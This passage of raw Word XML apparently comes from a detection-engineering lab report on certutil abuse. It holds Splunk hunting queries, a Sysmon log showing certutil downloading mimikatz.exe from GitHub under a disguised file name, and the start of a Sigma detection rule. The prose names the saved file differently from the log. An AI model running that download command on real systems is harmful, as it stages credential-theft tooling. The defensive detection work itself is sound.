            <w:tcW w:w="10025" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="3806CC61">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index=_internal host="Sh-Win10" EventCode=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A8AC0E4">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search Image="*\\certutil.exe" CommandLine="*urlcache*"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20279907">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| table _time host User ParentImage Image CommandLine ProcessGuid ProcessId IntegrityLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2ED2E540">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24261C05">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Splunk: scheduled task investigation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="123" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10025"/>
      </w:tblGrid>
      <w:tr w14:paraId="0A7F87D3">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10025" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="18F29AB5">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index=_internal host="Sh-Win10" EventCode=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A9285B">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search Image="*\\certutil.exe" CommandLine="*github.com*"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="374B994D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| table _time host User Image CommandLine ProcessGuid ProcessId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A470293">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57275F32">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF72AC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1328D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BFAE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C7845E">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074EC78E">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29865F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Process Create — certutil.exe Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="13328692">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="90" w:hRule="atLeast"/>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2237318B">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:16:27.590</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="642ECA87">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15F0188A">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Windows\System32\certutil.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69118D74">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C7AF49D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CommandLine:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B2D3876">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>certutil -urlcache -split -f "https://github.com/ParrotSec/mimikatz/raw/refs/heads/master/x64/mimikatz.exe" C:\Users\saada\Downloads\FreeClude.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA164CF">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="558E4941">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User: SH-WIN10\saad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED6A63F">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22EE965D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IntegrityLevel: High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15EFE718">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78D6F7C8">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessId: 1072</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="167F3BE1">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7755B486">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessGuid:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34EF0CCB">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>{4736c562-22ab-6ab5-3a03-000000001c00}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36188FA1">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CD44D4D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique: T1105 — Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47E2E7D0"/>
    <w:p w14:paraId="0A533F31">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sigma 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">certutil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">urlcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Remote File Transfer (Mapped Phase: Phase 6)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344A392A">
      <w:pPr>
        <w:pStyle w:val="36"/>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This rule detects the use of the native Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>certutil.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility to retrieve a remote file using the /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">urlcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">option. In the lab, the attacker used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">certutil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">urlcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>split -f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to download a remote executable and save it as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>GetClaude.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. The rule focuses on the certutil.exe image together with the /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">urlcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>command-line pattern, making it behavior-focused rather than dependent on the specific payload name.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="42D166B2">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3F6847C8">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>title: Suspicious certutil Remote File Transfer via URLCache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="103095A1">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>status: test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78920874">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54528715">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
